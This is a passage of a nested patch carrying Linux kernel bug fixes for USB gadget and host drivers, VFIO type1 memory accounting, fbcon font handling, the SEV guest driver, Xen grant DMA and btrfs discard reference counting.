+-				  UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE,
++				  UFSHCD_QUIRK_4KB_DMA_ALIGNMENT,
+ 	.opts			= EXYNOS_UFS_OPT_HAS_APB_CLK_CTRL |
+ 				  EXYNOS_UFS_OPT_BROKEN_AUTO_CLK_CTRL |
+ 				  EXYNOS_UFS_OPT_BROKEN_RX_SEL_IDX |
+diff --git a/drivers/usb/early/xhci-dbc.c b/drivers/usb/early/xhci-dbc.c
+index 7970471548202..f3e23be227d41 100644
+--- a/drivers/usb/early/xhci-dbc.c
++++ b/drivers/usb/early/xhci-dbc.c
+@@ -874,7 +874,8 @@ retry:
+ 
+ static void early_xdbc_write(struct console *con, const char *str, u32 n)
+ {
+-	static char buf[XDBC_MAX_PACKET];
++	/* static variables are zeroed, so buf is always NULL terminated */
++	static char buf[XDBC_MAX_PACKET + 1];
+ 	int chunk, ret;
+ 	int use_cr = 0;
+ 
+diff --git a/drivers/usb/fotg210/fotg210-udc.c b/drivers/usb/fotg210/fotg210-udc.c
+index eb076746f0320..7ba7fb52ddaac 100644
+--- a/drivers/usb/fotg210/fotg210-udc.c
++++ b/drivers/usb/fotg210/fotg210-udc.c
+@@ -710,6 +710,20 @@ static int fotg210_is_epnstall(struct fotg210_ep *ep)
+ 	return value & INOUTEPMPSR_STL_EP ? 1 : 0;
+ }
+ 
++/* For EP0 requests triggered by this driver (currently GET_STATUS response) */
++static void fotg210_ep0_complete(struct usb_ep *_ep, struct usb_request *req)
++{
++	struct fotg210_ep *ep;
++	struct fotg210_udc *fotg210;
++
++	ep = container_of(_ep, struct fotg210_ep, ep);
++	fotg210 = ep->fotg210;
++
++	if (req->status || req->actual != req->length) {
++		dev_warn(&fotg210->gadget.dev, "EP0 request failed: %d\n", req->status);
++	}
++}
++
+ static void fotg210_get_status(struct fotg210_udc *fotg210,
+ 				struct usb_ctrlrequest *ctrl)
+ {
+@@ -1261,6 +1275,8 @@ int fotg210_udc_probe(struct platform_device *pdev)
+ 	if (fotg210->ep0_req == NULL)
+ 		goto err_map;
+ 
++	fotg210->ep0_req->complete = fotg210_ep0_complete;
++
+ 	fotg210_init(fotg210);
+ 
+ 	fotg210_disable_unplug(fotg210);
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index 0853536cbf2e6..2ff34dc129c40 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -430,6 +430,12 @@ static int config_usb_cfg_link(
+ 	 * from another gadget or a random directory.
+ 	 * Also a function instance can only be linked once.
+ 	 */
++
++	if (gi->composite.gadget_driver.udc_name) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	list_for_each_entry(iter, &gi->available_func, cfs_list) {
+ 		if (iter != fi)
+ 			continue;
+diff --git a/drivers/usb/gadget/udc/fusb300_udc.c b/drivers/usb/gadget/udc/fusb300_udc.c
+index 5954800d652ca..08ba9c8c1e677 100644
+--- a/drivers/usb/gadget/udc/fusb300_udc.c
++++ b/drivers/usb/gadget/udc/fusb300_udc.c
+@@ -1346,6 +1346,7 @@ static int fusb300_remove(struct platform_device *pdev)
+ 	usb_del_gadget_udc(&fusb300->gadget);
+ 	iounmap(fusb300->reg);
+ 	free_irq(platform_get_irq(pdev, 0), fusb300);
++	free_irq(platform_get_irq(pdev, 1), fusb300);
+ 
+ 	fusb300_free_request(&fusb300->ep[0]->ep, fusb300->ep0_req);
+ 	for (i = 0; i < FUSB300_MAX_NUM_EP; i++)
+@@ -1431,7 +1432,7 @@ static int fusb300_probe(struct platform_device *pdev)
+ 			IRQF_SHARED, udc_name, fusb300);
+ 	if (ret < 0) {
+ 		pr_err("request_irq1 error (%d)\n", ret);
+-		goto clean_up;
++		goto err_request_irq1;
+ 	}
+ 
+ 	INIT_LIST_HEAD(&fusb300->gadget.ep_list);
+@@ -1470,7 +1471,7 @@ static int fusb300_probe(struct platform_device *pdev)
+ 				GFP_KERNEL);
+ 	if (fusb300->ep0_req == NULL) {
+ 		ret = -ENOMEM;
+-		goto clean_up3;
++		goto err_alloc_request;
+ 	}
+ 
+ 	init_controller(fusb300);
+@@ -1485,7 +1486,10 @@ static int fusb300_probe(struct platform_device *pdev)
+ err_add_udc:
+ 	fusb300_free_request(&fusb300->ep[0]->ep, fusb300->ep0_req);
+ 
+-clean_up3:
++err_alloc_request:
++	free_irq(ires1->start, fusb300);
++
++err_request_irq1:
+ 	free_irq(ires->start, fusb300);
+ 
+ clean_up:
+diff --git a/drivers/usb/host/fsl-mph-dr-of.c b/drivers/usb/host/fsl-mph-dr-of.c
+index e5df175228928..46c6a152b8655 100644
+--- a/drivers/usb/host/fsl-mph-dr-of.c
++++ b/drivers/usb/host/fsl-mph-dr-of.c
+@@ -112,8 +112,7 @@ static struct platform_device *fsl_usb2_device_register(
+ 			goto error;
+ 	}
+ 
+-	pdev->dev.of_node = ofdev->dev.of_node;
+-	pdev->dev.of_node_reused = true;
++	device_set_of_node_from_dev(&pdev->dev, &ofdev->dev);
+ 
+ 	retval = platform_device_add(pdev);
+ 	if (retval)
+diff --git a/drivers/usb/host/max3421-hcd.c b/drivers/usb/host/max3421-hcd.c
+index 352e3ac2b377b..19111e83ac131 100644
+--- a/drivers/usb/host/max3421-hcd.c
++++ b/drivers/usb/host/max3421-hcd.c
+@@ -1436,7 +1436,7 @@ max3421_spi_thread(void *dev_id)
+ 			 * use spi_wr_buf().
+ 			 */
+ 			for (i = 0; i < ARRAY_SIZE(max3421_hcd->iopins); ++i) {
+-				u8 val = spi_rd8(hcd, MAX3421_REG_IOPINS1);
++				u8 val = spi_rd8(hcd, MAX3421_REG_IOPINS1 + i);
+ 
+ 				val = ((val & 0xf0) |
+ 				       (max3421_hcd->iopins[i] & 0x0f));
+diff --git a/drivers/usb/musb/mediatek.c b/drivers/usb/musb/mediatek.c
+index cad991380b0cf..27b9bd2583400 100644
+--- a/drivers/usb/musb/mediatek.c
++++ b/drivers/usb/musb/mediatek.c
+@@ -294,7 +294,8 @@ static int mtk_musb_init(struct musb *musb)
+ err_phy_power_on:
+ 	phy_exit(glue->phy);
+ err_phy_init:
+-	mtk_otg_switch_exit(glue);
++	if (musb->port_mode == MUSB_OTG)
++		mtk_otg_switch_exit(glue);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/typec/mux/intel_pmc_mux.c b/drivers/usb/typec/mux/intel_pmc_mux.c
+index fdbf3694e21f4..87e2c91306070 100644
+--- a/drivers/usb/typec/mux/intel_pmc_mux.c
++++ b/drivers/usb/typec/mux/intel_pmc_mux.c
+@@ -614,8 +614,10 @@ static int pmc_usb_probe_iom(struct pmc_usb *pmc)
+ 
+ 	INIT_LIST_HEAD(&resource_list);
+ 	ret = acpi_dev_get_memory_resources(adev, &resource_list);
+-	if (ret < 0)
++	if (ret < 0) {
++		acpi_dev_put(adev);
+ 		return ret;
++	}
+ 
+ 	rentry = list_first_entry_or_null(&resource_list, struct resource_entry, node);
+ 	if (rentry)
+diff --git a/drivers/vfio/group.c b/drivers/vfio/group.c
+index bb24b2f0271e0..855db15477813 100644
+--- a/drivers/vfio/group.c
++++ b/drivers/vfio/group.c
+@@ -137,7 +137,7 @@ static int vfio_group_ioctl_set_container(struct vfio_group *group,
+ 
+ 		ret = iommufd_vfio_compat_ioas_id(iommufd, &ioas_id);
+ 		if (ret) {
+-			iommufd_ctx_put(group->iommufd);
++			iommufd_ctx_put(iommufd);
+ 			goto out_unlock;
+ 		}
+ 
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 2209372f236db..7fa68dc4e938a 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -100,6 +100,8 @@ struct vfio_dma {
+ 	struct task_struct	*task;
+ 	struct rb_root		pfn_list;	/* Ex-user pinned pfn list */
+ 	unsigned long		*bitmap;
++	struct mm_struct	*mm;
++	size_t			locked_vm;
+ };
+ 
+ struct vfio_batch {
+@@ -412,6 +414,19 @@ static int vfio_iova_put_vfio_pfn(struct vfio_dma *dma, struct vfio_pfn *vpfn)
+ 	return ret;
+ }
+ 
++static int mm_lock_acct(struct task_struct *task, struct mm_struct *mm,
++			bool lock_cap, long npage)
++{
++	int ret = mmap_write_lock_killable(mm);
++
++	if (ret)
++		return ret;
++
++	ret = __account_locked_vm(mm, abs(npage), npage > 0, task, lock_cap);
++	mmap_write_unlock(mm);
++	return ret;
++}
++
+ static int vfio_lock_acct(struct vfio_dma *dma, long npage, bool async)
+ {
+ 	struct mm_struct *mm;
+@@ -420,16 +435,13 @@ static int vfio_lock_acct(struct vfio_dma *dma, long npage, bool async)
+ 	if (!npage)
+ 		return 0;
+ 
+-	mm = async ? get_task_mm(dma->task) : dma->task->mm;
+-	if (!mm)
++	mm = dma->mm;
++	if (async && !mmget_not_zero(mm))
+ 		return -ESRCH; /* process exited */
+ 
+-	ret = mmap_write_lock_killable(mm);
+-	if (!ret) {
+-		ret = __account_locked_vm(mm, abs(npage), npage > 0, dma->task,
+-					  dma->lock_cap);
+-		mmap_write_unlock(mm);
+-	}
++	ret = mm_lock_acct(dma->task, mm, dma->lock_cap, npage);
++	if (!ret)
++		dma->locked_vm += npage;
+ 
+ 	if (async)
+ 		mmput(mm);
+@@ -794,8 +806,8 @@ static int vfio_pin_page_external(struct vfio_dma *dma, unsigned long vaddr,
+ 	struct mm_struct *mm;
+ 	int ret;
+ 
+-	mm = get_task_mm(dma->task);
+-	if (!mm)
++	mm = dma->mm;
++	if (!mmget_not_zero(mm))
+ 		return -ENODEV;
+ 
+ 	ret = vaddr_get_pfns(mm, vaddr, 1, dma->prot, pfn_base, pages);
+@@ -805,7 +817,7 @@ static int vfio_pin_page_external(struct vfio_dma *dma, unsigned long vaddr,
+ 	ret = 0;
+ 
+ 	if (do_accounting && !is_invalid_reserved_pfn(*pfn_base)) {
+-		ret = vfio_lock_acct(dma, 1, true);
++		ret = vfio_lock_acct(dma, 1, false);
+ 		if (ret) {
+ 			put_pfn(*pfn_base, dma->prot);
+ 			if (ret == -ENOMEM)
+@@ -861,6 +873,12 @@ static int vfio_iommu_type1_pin_pages(void *iommu_data,
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	if (WARN_ONCE(iommu->vaddr_invalid_count,
++		      "vfio_pin_pages not allowed with VFIO_UPDATE_VADDR\n")) {
++		ret = -EBUSY;
++		goto pin_done;
++	}
++
+ 	/*
+ 	 * Wait for all necessary vaddr's to be valid so they can be used in
+ 	 * the main loop without dropping the lock, to avoid racing vs unmap.
+@@ -1174,6 +1192,7 @@ static void vfio_remove_dma(struct vfio_iommu *iommu, struct vfio_dma *dma)
+ 	vfio_unmap_unpin(iommu, dma, true);
+ 	vfio_unlink_dma(iommu, dma);
+ 	put_task_struct(dma->task);
++	mmdrop(dma->mm);
+ 	vfio_dma_bitmap_free(dma);
+ 	if (dma->vaddr_invalid) {
+ 		iommu->vaddr_invalid_count--;
+@@ -1343,6 +1362,12 @@ static int vfio_dma_do_unmap(struct vfio_iommu *iommu,
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	/* Cannot update vaddr if mdev is present. */
++	if (invalidate_vaddr && !list_empty(&iommu->emulated_iommu_groups)) {
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	pgshift = __ffs(iommu->pgsize_bitmap);
+ 	pgsize = (size_t)1 << pgshift;
+ 
+@@ -1566,6 +1591,38 @@ static bool vfio_iommu_iova_dma_valid(struct vfio_iommu *iommu,
+ 	return list_empty(iova);
+ }
+ 
++static int vfio_change_dma_owner(struct vfio_dma *dma)
++{
++	struct task_struct *task = current->group_leader;
++	struct mm_struct *mm = current->mm;
++	long npage = dma->locked_vm;
++	bool lock_cap;
++	int ret;
++
++	if (mm == dma->mm)
++		return 0;
++
++	lock_cap = capable(CAP_IPC_LOCK);
++	ret = mm_lock_acct(task, mm, lock_cap, npage);
++	if (ret)
++		return ret;
++
++	if (mmget_not_zero(dma->mm)) {
++		mm_lock_acct(dma->task, dma->mm, dma->lock_cap, -npage);
++		mmput(dma->mm);
++	}
++
++	if (dma->task != task) {
++		put_task_struct(dma->task);
++		dma->task = get_task_struct(task);
++	}
++	mmdrop(dma->mm);
++	dma->mm = mm;
++	mmgrab(dma->mm);
++	dma->lock_cap = lock_cap;
++	return 0;
++}
++
+ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 			   struct vfio_iommu_type1_dma_map *map)
+ {
+@@ -1615,6 +1672,9 @@ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 			   dma->size != size) {
+ 			ret = -EINVAL;
+ 		} else {
++			ret = vfio_change_dma_owner(dma);
++			if (ret)
++				goto out_unlock;
+ 			dma->vaddr = vaddr;
+ 			dma->vaddr_invalid = false;
+ 			iommu->vaddr_invalid_count--;
+@@ -1652,29 +1712,15 @@ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 	 * against the locked memory limit and we need to be able to do both
+ 	 * outside of this call path as pinning can be asynchronous via the
+ 	 * external interfaces for mdev devices.  RLIMIT_MEMLOCK requires a
+-	 * task_struct and VM locked pages requires an mm_struct, however
+-	 * holding an indefinite mm reference is not recommended, therefore we
+-	 * only hold a reference to a task.  We could hold a reference to
+-	 * current, however QEMU uses this call path through vCPU threads,
+-	 * which can be killed resulting in a NULL mm and failure in the unmap
+-	 * path when called via a different thread.  Avoid this problem by
+-	 * using the group_leader as threads within the same group require
+-	 * both CLONE_THREAD and CLONE_VM and will therefore use the same
+-	 * mm_struct.
+-	 *
+-	 * Previously we also used the task for testing CAP_IPC_LOCK at the
+-	 * time of pinning and accounting, however has_capability() makes use
+-	 * of real_cred, a copy-on-write field, so we can't guarantee that it
+-	 * matches group_leader, or in fact that it might not change by the
+-	 * time it's evaluated.  If a process were to call MAP_DMA with
+-	 * CAP_IPC_LOCK but later drop it, it doesn't make sense that they
+-	 * possibly see different results for an iommu_mapped vfio_dma vs
+-	 * externally mapped.  Therefore track CAP_IPC_LOCK in vfio_dma at the
+-	 * time of calling MAP_DMA.
++	 * task_struct. Save the group_leader so that all DMA tracking uses
++	 * the same task, to make debugging easier.  VM locked pages requires
++	 * an mm_struct, so grab the mm in case the task dies.
+ 	 */
+ 	get_task_struct(current->group_leader);
+ 	dma->task = current->group_leader;
+ 	dma->lock_cap = capable(CAP_IPC_LOCK);
++	dma->mm = current->mm;
++	mmgrab(dma->mm);
+ 
+ 	dma->pfn_list = RB_ROOT;
+ 
+@@ -2194,11 +2240,16 @@ static int vfio_iommu_type1_attach_group(void *iommu_data,
+ 	struct iommu_domain_geometry *geo;
+ 	LIST_HEAD(iova_copy);
+ 	LIST_HEAD(group_resv_regions);
+-	int ret = -EINVAL;
++	int ret = -EBUSY;
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	/* Attach could require pinning, so disallow while vaddr is invalid. */
++	if (iommu->vaddr_invalid_count)
++		goto out_unlock;
++
+ 	/* Check for duplicates */
++	ret = -EINVAL;
+ 	if (vfio_iommu_find_iommu_group(iommu, iommu_group))
+ 		goto out_unlock;
+ 
+@@ -2669,6 +2720,16 @@ static int vfio_domains_have_enforce_cache_coherency(struct vfio_iommu *iommu)
+ 	return ret;
+ }
+ 
++static bool vfio_iommu_has_emulated(struct vfio_iommu *iommu)
++{
++	bool ret;
++
++	mutex_lock(&iommu->lock);
++	ret = !list_empty(&iommu->emulated_iommu_groups);
++	mutex_unlock(&iommu->lock);
++	return ret;
++}
++
+ static int vfio_iommu_type1_check_extension(struct vfio_iommu *iommu,
+ 					    unsigned long arg)
+ {
+@@ -2677,8 +2738,13 @@ static int vfio_iommu_type1_check_extension(struct vfio_iommu *iommu,
+ 	case VFIO_TYPE1v2_IOMMU:
+ 	case VFIO_TYPE1_NESTING_IOMMU:
+ 	case VFIO_UNMAP_ALL:
+-	case VFIO_UPDATE_VADDR:
+ 		return 1;
++	case VFIO_UPDATE_VADDR:
++		/*
++		 * Disable this feature if mdevs are present.  They cannot
++		 * safely pin/unpin/rw while vaddrs are being updated.
++		 */
++		return iommu && !vfio_iommu_has_emulated(iommu);
+ 	case VFIO_DMA_CC_IOMMU:
+ 		if (!iommu)
+ 			return 0;
+@@ -3099,9 +3165,8 @@ static int vfio_iommu_type1_dma_rw_chunk(struct vfio_iommu *iommu,
+ 			!(dma->prot & IOMMU_READ))
+ 		return -EPERM;
+ 
+-	mm = get_task_mm(dma->task);
+-
+-	if (!mm)
++	mm = dma->mm;
++	if (!mmget_not_zero(mm))
+ 		return -EPERM;
+ 
+ 	if (kthread)
+@@ -3147,6 +3212,13 @@ static int vfio_iommu_type1_dma_rw(void *iommu_data, dma_addr_t user_iova,
+ 	size_t done;
+ 
+ 	mutex_lock(&iommu->lock);
++
++	if (WARN_ONCE(iommu->vaddr_invalid_count,
++		      "vfio_dma_rw not allowed with VFIO_UPDATE_VADDR\n")) {
++		ret = -EBUSY;
++		goto out;
++	}
++
+ 	while (count > 0) {
+ 		ret = vfio_iommu_type1_dma_rw_chunk(iommu, user_iova, data,
+ 						    count, write, &done);
+@@ -3158,6 +3230,7 @@ static int vfio_iommu_type1_dma_rw(void *iommu_data, dma_addr_t user_iova,
+ 		user_iova += done;
+ 	}
+ 
++out:
+ 	mutex_unlock(&iommu->lock);
+ 	return ret;
+ }
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 1b14c21af2b74..2bc8baa90c0f2 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -958,7 +958,7 @@ static const char *fbcon_startup(void)
+ 	set_blitting_type(vc, info);
+ 
+ 	/* Setup default font */
+-	if (!p->fontdata && !vc->vc_font.data) {
++	if (!p->fontdata) {
+ 		if (!fontname[0] || !(font = find_font(fontname)))
+ 			font = get_default_font(info->var.xres,
+ 						info->var.yres,
+@@ -968,8 +968,6 @@ static const char *fbcon_startup(void)
+ 		vc->vc_font.height = font->height;
+ 		vc->vc_font.data = (void *)(p->fontdata = font->data);
+ 		vc->vc_font.charcount = font->charcount;
+-	} else {
+-		p->fontdata = vc->vc_font.data;
+ 	}
+ 
+ 	cols = FBCON_SWAP(ops->rotate, info->var.xres, info->var.yres);
+@@ -1135,9 +1133,9 @@ static void fbcon_init(struct vc_data *vc, int init)
+ 	ops->p = &fb_display[fg_console];
+ }
+ 
+-static void fbcon_free_font(struct fbcon_display *p, bool freefont)
++static void fbcon_free_font(struct fbcon_display *p)
+ {
+-	if (freefont && p->userfont && p->fontdata && (--REFCOUNT(p->fontdata) == 0))
++	if (p->userfont && p->fontdata && (--REFCOUNT(p->fontdata) == 0))
+ 		kfree(p->fontdata - FONT_EXTRA_WORDS * sizeof(int));
+ 	p->fontdata = NULL;
+ 	p->userfont = 0;
+@@ -1172,8 +1170,8 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	struct fb_info *info;
+ 	struct fbcon_ops *ops;
+ 	int idx;
+-	bool free_font = true;
+ 
++	fbcon_free_font(p);
+ 	idx = con2fb_map[vc->vc_num];
+ 
+ 	if (idx == -1)
+@@ -1184,8 +1182,6 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	if (!info)
+ 		goto finished;
+ 
+-	if (info->flags & FBINFO_MISC_FIRMWARE)
+-		free_font = false;
+ 	ops = info->fbcon_par;
+ 
+ 	if (!ops)
+@@ -1197,9 +1193,8 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	ops->initialized = false;
+ finished:
+ 
+-	fbcon_free_font(p, free_font);
+-	if (free_font)
+-		vc->vc_font.data = NULL;
++	fbcon_free_font(p);
++	vc->vc_font.data = NULL;
+ 
+ 	if (vc->vc_hi_font_mask && vc->vc_screenbuf)
+ 		set_vc_hi_font(vc, false);
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 4ec4174e05a3c..7b4e9009f3355 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -377,9 +377,26 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		snp_dev->input.data_npages = certs_npages;
+ 	}
+ 
++	/*
++	 * Increment the message sequence number. There is no harm in doing
++	 * this now because decryption uses the value stored in the response
++	 * structure and any failure will wipe the VMPCK, preventing further
++	 * use anyway.
++	 */
++	snp_inc_msg_seqno(snp_dev);
++
+ 	if (fw_err)
+ 		*fw_err = err;
+ 
++	/*
++	 * If an extended guest request was issued and the supplied certificate
++	 * buffer was not large enough, a standard guest request was issued to
++	 * prevent IV reuse. If the standard request was successful, return -EIO
++	 * back to the caller as would have originally been returned.
++	 */
++	if (!rc && err == SNP_GUEST_REQ_INVALID_LEN)
++		return -EIO;
++
+ 	if (rc) {
+ 		dev_alert(snp_dev->dev,
+ 			  "Detected error from ASP request. rc: %d, fw_err: %llu\n",
+@@ -395,9 +412,6 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		goto disable_vmpck;
+ 	}
+ 
+-	/* Increment to new message sequence after payload decryption was successful. */
+-	snp_inc_msg_seqno(snp_dev);
+-
+ 	return 0;
+ 
+ disable_vmpck:
+diff --git a/drivers/xen/grant-dma-iommu.c b/drivers/xen/grant-dma-iommu.c
+index 16b8bc0c0b33d..6a9fe02c6bfcc 100644
+--- a/drivers/xen/grant-dma-iommu.c
++++ b/drivers/xen/grant-dma-iommu.c
+@@ -16,8 +16,15 @@ struct grant_dma_iommu_device {
+ 	struct iommu_device iommu;
+ };
+ 
+-/* Nothing is really needed here */
+-static const struct iommu_ops grant_dma_iommu_ops;
++static struct iommu_device *grant_dma_iommu_probe_device(struct device *dev)
++{
++	return ERR_PTR(-ENODEV);
++}
++
++/* Nothing is really needed here except a dummy probe_device callback */
++static const struct iommu_ops grant_dma_iommu_ops = {
++	.probe_device = grant_dma_iommu_probe_device,
++};
+ 
+ static const struct of_device_id grant_dma_iommu_of_match[] = {
+ 	{ .compatible = "xen,grant-dma" },
+diff --git a/fs/btrfs/discard.c b/fs/btrfs/discard.c
+index ff2e524d99377..317aeff6c1dac 100644
+--- a/fs/btrfs/discard.c
++++ b/fs/btrfs/discard.c
+@@ -78,6 +78,7 @@ static struct list_head *get_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ static void __add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 				  struct btrfs_block_group *block_group)
+ {
++	lockdep_assert_held(&discard_ctl->lock);
+ 	if (!btrfs_run_discard_work(discard_ctl))
+ 		return;
+ 
+@@ -89,6 +90,8 @@ static void __add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 						      BTRFS_DISCARD_DELAY);
+ 		block_group->discard_state = BTRFS_DISCARD_RESET_CURSOR;
+ 	}
++	if (list_empty(&block_group->discard_list))
++		btrfs_get_block_group(block_group);
+ 
+ 	list_move_tail(&block_group->discard_list,
+ 		       get_discard_list(discard_ctl, block_group));
+@@ -108,8 +111,12 @@ static void add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ static void add_to_discard_unused_list(struct btrfs_discard_ctl *discard_ctl,
+ 				       struct btrfs_block_group *block_group)
+ {
++	bool queued;
++
+ 	spin_lock(&discard_ctl->lock);
+ 
++	queued = !list_empty(&block_group->discard_list);
++
+ 	if (!btrfs_run_discard_work(discard_ctl)) {
+ 		spin_unlock(&discard_ctl->lock);
+ 		return;
+@@ -121,6 +128,8 @@ static void add_to_discard_unused_list(struct btrfs_discard_ctl *discard_ctl,
+ 	block_group->discard_eligible_time = (ktime_get_ns() +
+ 					      BTRFS_DISCARD_UNUSED_DELAY);
+ 	block_group->discard_state = BTRFS_DISCARD_RESET_CURSOR;
++	if (!queued)
++		btrfs_get_block_group(block_group);
+ 	list_add_tail(&block_group->discard_list,
+ 		      &discard_ctl->discard_list[BTRFS_DISCARD_INDEX_UNUSED]);
+ 
+@@ -131,6 +140,7 @@ static bool remove_from_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 				     struct btrfs_block_group *block_group)
+ {
+ 	bool running = false;
++	bool queued = false;
+ 
+ 	spin_lock(&discard_ctl->lock);
+ 
+@@ -140,7 +150,16 @@ static bool remove_from_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 	}
+ 
+ 	block_group->discard_eligible_time = 0;
++	queued = !list_empty(&block_group->discard_list);
+ 	list_del_init(&block_group->discard_list);
++	/*
++	 * If the block group is currently running in the discard workfn, we
++	 * don't want to deref it, since it's still being used by the workfn.
++	 * The workfn will notice this case and deref the block group when it is
++	 * finished.
++	 */
++	if (queued && !running)
++		btrfs_put_block_group(block_group);
+ 
+ 	spin_unlock(&discard_ctl->lock);
+ 
+@@ -214,10 +233,12 @@ again:
+ 	if (block_group && now >= block_group->discard_eligible_time) {
+ 		if (block_group->discard_index == BTRFS_DISCARD_INDEX_UNUSED &&
+ 		    block_group->used != 0) {
+-			if (btrfs_is_block_group_data_only(block_group))
++			if (btrfs_is_block_group_data_only(block_group)) {
+ 				__add_to_discard_list(discard_ctl, block_group);
+-			else
++			} else {
+ 				list_del_init(&block_group->discard_list);
++				btrfs_put_block_group(block_group);
++			}
+ 			goto again;
+ 		}
+ 		if (block_group->discard_state == BTRFS_DISCARD_RESET_CURSOR) {
+@@ -511,6 +532,15 @@ static void btrfs_discard_workfn(struct work_struct *work)
+ 	spin_lock(&discard_ctl->lock);
+ 	discard_ctl->prev_discard = trimmed;
+ 	discard_ctl->prev_discard_time = now;
++	/*
++	 * If the block group was removed from the discard list while it was
++	 * running in this workfn, then we didn't deref it, since this function
++	 * still owned that reference. But we set the discard_ctl->block_group
++	 * back to NULL, so we can use that condition to know that now we need
++	 * to deref the block_group.
++	 */
++	if (discard_ctl->block_group == NULL)
++		btrfs_put_block_group(block_group);
+ 	discard_ctl->block_group = NULL;
+ 	__btrfs_discard_schedule_work(discard_ctl, now, false);
+ 	spin_unlock(&discard_ctl->lock);
+@@ -651,8 +681,12 @@ void btrfs_discard_punt_unused_bgs_list(struct btrfs_fs_info *fs_info)
+ 	list_for_each_entry_safe(block_group, next, &fs_info->unused_bgs,
+ 				 bg_list) {
+ 		list_del_init(&block_group->bg_list);
+-		btrfs_put_block_group(block_group);
+ 		btrfs_discard_queue_work(&fs_info->discard_ctl, block_group);
++		/*
++		 * This put is for the get done by btrfs_mark_bg_unused.
++		 * Queueing discard incremented it for discard's reference.
++		 */
++		btrfs_put_block_group(block_group);
+ 	}
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ }
+@@ -683,6 +717,7 @@ static void btrfs_discard_purge_list(struct btrfs_discard_ctl *discard_ctl)
+ 			if (block_group->used == 0)
+ 				btrfs_mark_bg_unused(block_group);
+ 			spin_lock(&discard_ctl->lock);
++			btrfs_put_block_group(block_group);
+ 		}
+ 	}
+ 	spin_unlock(&discard_ctl->lock);
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 3aa04224315eb..fde40112a2593 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1910,6 +1910,9 @@ static int cleaner_kthread(void *arg)
+ 			goto sleep;
+ 		}
+ 
++		if (test_and_clear_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags))
++			btrfs_sysfs_feature_update(fs_info);
++
+ 		btrfs_run_delayed_iputs(fs_info);
+ 
+ 		again = btrfs_clean_one_deleted_snapshot(fs_info);
+diff --git a/fs/btrfs/fs.c b/fs/btrfs/fs.c
+index 5553e1f8afe8e..31c1648bc0b46 100644
+--- a/fs/btrfs/fs.c
++++ b/fs/btrfs/fs.c
+@@ -24,6 +24,7 @@ void __btrfs_set_fs_incompat(struct btrfs_fs_info *fs_info, u64 flag,
+ 				name, flag);
+ 		}
+ 		spin_unlock(&fs_info->super_lock);
++		set_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags);
+ 	}
+ }
+ 
+@@ -46,6 +47,7 @@ void __btrfs_clear_fs_incompat(struct btrfs_fs_info *fs_info, u64 flag,
+ 				name, flag);
+ 		}
+ 		spin_unlock(&fs_info->super_lock);
++		set_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags);
+ 	}
+ }
+ 
+@@ -68,6 +70,7 @@ void __btrfs_set_fs_compat_ro(struct btrfs_fs_info *fs_info, u64 flag,
+ 				name, flag);
+ 		}
+ 		spin_unlock(&fs_info->super_lock);
++		set_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags);
+ 	}
+ }
+ 
+@@ -90,5 +93,6 @@ void __btrfs_clear_fs_compat_ro(struct btrfs_fs_info *fs_info, u64 flag,
+ 				name, flag);
+ 		}
+ 		spin_unlock(&fs_info->super_lock);
++		set_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags);
+ 	}
+ }
+diff --git a/fs/btrfs/fs.h b/fs/btrfs/fs.h
+index 37b86acfcbcf8..3d8156fc8523f 100644
+--- a/fs/btrfs/fs.h
++++ b/fs/btrfs/fs.h
+@@ -125,6 +125,12 @@ enum {
+ 	 */
+ 	BTRFS_FS_NO_OVERCOMMIT,
+ 
++	/*
++	 * Indicate if we have some features changed, this is mostly for
++	 * cleaner thread to update the sysfs interface.
++	 */
++	BTRFS_FS_FEATURE_CHANGED,
++
+ #if BITS_PER_LONG == 32
+ 	/* Indicate if we have error/warn message printed on 32bit systems */
+ 	BTRFS_FS_32BIT_ERROR,
+diff --git a/fs/btrfs/scrub.c b/fs/btrfs/scrub.c
+index 52b346795f660..a5d026041be45 100644
+--- a/fs/btrfs/scrub.c
++++ b/fs/btrfs/scrub.c
